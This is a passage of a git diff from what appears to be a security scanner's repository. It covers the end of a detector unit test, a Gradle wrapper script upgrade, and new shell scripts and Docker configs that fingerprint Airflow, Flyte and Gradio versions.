.detect(buildTargetInfo(forHostname(mockWebServer.getHostName())), httpServices) + .getDetectionReportsList(); + + assertThat(report).isEmpty(); + } + + @Test + public void detect_whenNotVulnerableContent_reportsNothing() { + mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody("Irrelevant")); + mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody("Irrelevant")); + ImmutableList httpServices = + ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + + var report = + detector + .detect(buildTargetInfo(forHostname(mockWebServer.getHostName())), httpServices) + .getDetectionReportsList(); + + assertThat(report).isEmpty(); + } + + private static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } +} diff --git a/google/fingerprinters/web/build.gradle b/google/fingerprinters/web/build.gradle index 61b1c81e2..184d8c43f 100644 --- a/google/fingerprinters/web/build.gradle +++ b/google/fingerprinters/web/build.gradle @@ -122,12 +122,3 @@ task runFingerprintFileConverter(type: JavaExec) { classpath = sourceSets.main.runtimeClasspath mainClass = 'com.google.tsunami.plugins.fingerprinters.web.tools.FingerprintFileConverter' } - -// Force the JRE flavor of Guava for tasks that don't advertise themselves as targeting the JRE. -// https://github.com/google/guava/releases/tag/v32.1.0 -// https://github.com/square/okio/issues/647 -configurations.all { configuration -> - if (name == "compileClasspath" || name == "runtimeClasspath" || name == "compileProtoPath" || name == "testCompileProtoPath" || name == "testCompileClasspath" || name == "testRuntimeClasspath") { - attributes.attribute(Attribute.of("org.gradle.jvm.environment", String), "standard-jvm") - } -} diff --git a/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.jar b/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.jar and b/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.properties b/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.properties +++ b/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/fingerprinters/web/gradlew b/google/fingerprinters/web/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/fingerprinters/web/gradlew +++ b/google/fingerprinters/web/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/fingerprinters/web/gradlew.bat b/google/fingerprinters/web/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/fingerprinters/web/gradlew.bat +++ b/google/fingerprinters/web/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/fingerprinters/web/scripts/updater/community/airflow/app/docker-compose.yaml b/google/fingerprinters/web/scripts/updater/community/airflow/app/docker-compose.yaml new file mode 100755 index 000000000..8b1378917 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/airflow/app/docker-compose.yaml @@ -0,0 +1 @@ + diff --git a/google/fingerprinters/web/scripts/updater/community/airflow/update.sh b/google/fingerprinters/web/scripts/updater/community/airflow/update.sh new file mode 100755 index 000000000..a7ff42bd6 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/airflow/update.sh @@ -0,0 +1,94 @@ +#!/usr/bin/env bash + +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of Airflow. +APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/airflow_fingerprints" +# Path to the local git repository for Airflow codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/airflow.binproto" +# Read all the versions to be fingerprinted. +readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" +mkdir -p "${FINGERPRINTS_PATH}" + +startAirflow() { + local version="$1" + pushd "${APP_PATH}" >/dev/null + COMPOSE_HTTP_TIMEOUT=200 AIRFLOW_UID=65535 docker-compose -f airflow-${version}.yaml up -d + popd >/dev/null +} + +stopAirflow() { + local version="$1" + pushd "${APP_PATH}" >/dev/null + COMPOSE_HTTP_TIMEOUT=200 AIRFLOW_UID=65535 docker-compose -f airflow-${version}.yaml down --volumes --remove-orphans + popd >/dev/null +} + +# Convert the existing data file to a human-readable json file. +convertFingerprint \ + "${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/airflow.binproto" \ + "${JSON_DATA}" + +# Fetch Airflow codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/apache/airflow.git "${GIT_REPO}" +fi + +# Update for all the versions listed in versions.txt file. +for version in "${ALL_VERSIONS[@]}"; do + echo "Fingerprinting Airflow version ${version} ..." + # Download docker-compose.yaml of each version. + curl -L https://airflow.apache.org/docs/apache-airflow/${version}/docker-compose.yaml -o $APP_PATH/airflow-${version}.yaml + # Start a live instance of Airflow. + startAirflow "${version}" + # Arbitrarily chosen so that Airflow is up and running. + echo "Waiting for Airflow ${version} to be ready ..." + sleep 60 + # No need to do other installation process for Airflow. + touch ${FINGERPRINTS_PATH}/fingerprint.${version}.json + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "${version}" + + updateFingerprint \ + "airflow" \ + "${version}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}" \ + "http://localhost:8080" + + # Stop the live instance of Airflow. + stopAirflow "${version}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Airflow. Please commit the following file:" +echo " ${BIN_DATA}" diff --git a/google/fingerprinters/web/scripts/updater/community/airflow/versions.txt b/google/fingerprinters/web/scripts/updater/community/airflow/versions.txt new file mode 100755 index 000000000..70ef91b70 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/airflow/versions.txt @@ -0,0 +1,40 @@ +2.8.4 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 diff --git a/google/fingerprinters/web/scripts/updater/community/flyte/app/docker-compose.yml b/google/fingerprinters/web/scripts/updater/community/flyte/app/docker-compose.yml new file mode 100644 index 000000000..70772b749 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/flyte/app/docker-compose.yml @@ -0,0 +1,8 @@ +services: + flyte-console: + image: ghcr.io/flyteorg/flyteconsole-release:${FLYTE_CONSOLE_VERSION} + ports: + - 8080:8080 + environment: + BASE_URL: "/console" + CONFIG_DIR: "/etc/flyte/config" diff --git a/google/fingerprinters/web/scripts/updater/community/flyte/update.sh b/google/fingerprinters/web/scripts/updater/community/flyte/update.sh new file mode 100755 index 000000000..c90d71558 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/flyte/update.sh @@ -0,0 +1,97 @@ +#!/usr/bin/env bash + +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of Flyte. +FLYTE_APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/FLYTE_fingerprints" +# Path to the local git repository for Flyte codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +# Read all the versions to be fingerprinted. +readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" +mkdir -p "${FINGERPRINTS_PATH}" + +startFlyteConsole() { + local version="$1" + pushd "${FLYTE_APP_PATH}" >/dev/null + FLYTE_CONSOLE_VERSION="${version}" docker compose up -d + popd >/dev/null +} + +stopFlyteConsole() { + local version="$1" + pushd "${FLYTE_APP_PATH}" >/dev/null + FLYTE_CONSOLE_VERSION="${version}" docker compose down --volumes --remove-orphans + popd >/dev/null +} + +createFingerprintForDashboard() { + local FLYTE_CONSOLE_VERSION="$1" + + echo "Fingerprinting Flyte version ${FLYTE_CONSOLE_VERSION} ..." + # Start a live instance of Flyte. + startFlyteConsole "${FLYTE_CONSOLE_VERSION}" + # Arbitrarily chosen so that FlyteFlyte is up and running. + echo "Waiting for Flyte ${FLYTE_CONSOLE_VERSION} to be ready ..." + sleep 10 + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "${FLYTE_CONSOLE_VERSION}" + + updateFingerprint \ + "flyte" \ + "${FLYTE_CONSOLE_VERSION}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}/website/console" \ + "http://localhost:8080/console/" + + # Stop the live instance of Flyte. + stopFlyteConsole "${FLYTE_CONSOLE_VERSION}" +} + + +# Convert the existing data file to a human-readable json file. +convertFingerprint \ + "${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/flyte.binproto" \ + "${JSON_DATA}" + +# Fetch Flyte codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/flyteorg/flyteconsole.git "${GIT_REPO}" +fi + +# Update for all the versions listed in versions.txt file. +for FLYTE_CONSOLE_VERSION in "${ALL_VERSIONS[@]}"; do + createFingerprintForDashboard "${FLYTE_CONSOLE_VERSION}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Flyte. Please commit the following file:" +echo " ${BIN_DATA}" \ No newline at end of file diff --git a/google/fingerprinters/web/scripts/updater/community/flyte/versions.txt b/google/fingerprinters/web/scripts/updater/community/flyte/versions.txt new file mode 100644 index 000000000..dc61061f8 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/flyte/versions.txt @@ -0,0 +1,26 @@ +v1.12.0 +v1.11.0 +v1.10.0 +v1.9.1 +v1.9.0 +v1.8.1 +v1.8.0 +v1.7.0 +v1.6.2 +v1.6.1 +v1.6.0 +v1.5.1 +v1.5.0 +v1.4.3 +v1.4.2 +v1.4.1 +v1.4.0 +v1.3.0 +v1.2.1 +v1.2.0 +v1.1.6 +v1.1.3 +v1.1.0 +v1.1.1 +v1.0.0 +v0.19.4 diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/app/Dockerfile b/google/fingerprinters/web/scripts/updater/community/gradio/app/Dockerfile new file mode 100644 index 000000000..85510e999 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/gradio/app/Dockerfile @@ -0,0 +1,11 @@ +FROM python:3.9-slim + +ARG version + +RUN python -m pip install gradio==$version + +ADD test_app.py /workspace/ + +EXPOSE 8000 + +CMD [ "python3" , "/workspace/test_app.py" ] \ No newline at end of file diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/app/docker-compose.yml b/google/fingerprinters/web/scripts/updater/community/gradio/app/docker-compose.yml new file mode 100644 index 000000000..470660edd --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/gradio/app/docker-compose.yml @@ -0,0 +1,8 @@ +services: + gradio: + build: + context: . + args: + version: ${GRADIO_VERSION} + ports: + - "8000:8000" \ No newline at end of file diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/app/test_app.py b/google/fingerprinters/web/scripts/updater/community/gradio/app/test_app.py new file mode 100644 index 000000000..1d44fd9bb --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/gradio/app/test_app.py @@ -0,0 +1,13 @@ +import gradio as gr + +def greet(name, intensity): + return "Hello, " + name + "!" * int(intensity) + +demo = gr.Interface( + fn=greet, + inputs=["text", "slider"], + outputs=["text"], +) + +if __name__ == "__main__": + demo.launch(server_name="0.0.0.0", server_port=8000) \ No newline at end of file diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/update.sh b/google/fingerprinters/web/scripts/updater/community/gradio/update.sh new file mode 100755 index 000000000..c848d74b7 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/gradio/update.sh @@ -0,0 +1,90 @@ +#!/usr/bin/env bash + +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of Gradio. +GRADIO_APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/gradio_fingerprints" +# Path to the local git repository for Gradio codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +# Read all the versions to be fingerprinted. +readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" +mkdir -p "${FINGERPRINTS_PATH}" + +startGradio() { + local version="$1" + pushd "${GRADIO_APP_PATH}" >/dev/null + GRADIO_VERSION="${version}" docker-compose up --build -d + popd >/dev/null +} + +stopGradio() { + local version="$1" + pushd "${GRADIO_APP_PATH}" >/dev/null + GRADIO_VERSION="${version}" docker-compose down --volumes --remove-orphans + popd >/dev/null +} + +# Convert the existing data file to a human-readable json file. +convertFingerprint \ + "${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/gradio.binproto" \ + "${JSON_DATA}" + +# Fetch Gradio codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/gradio-app/gradio.git "${GIT_REPO}" +fi + +# Update for all the versions listed in versions.txt file. +for gradio_version in 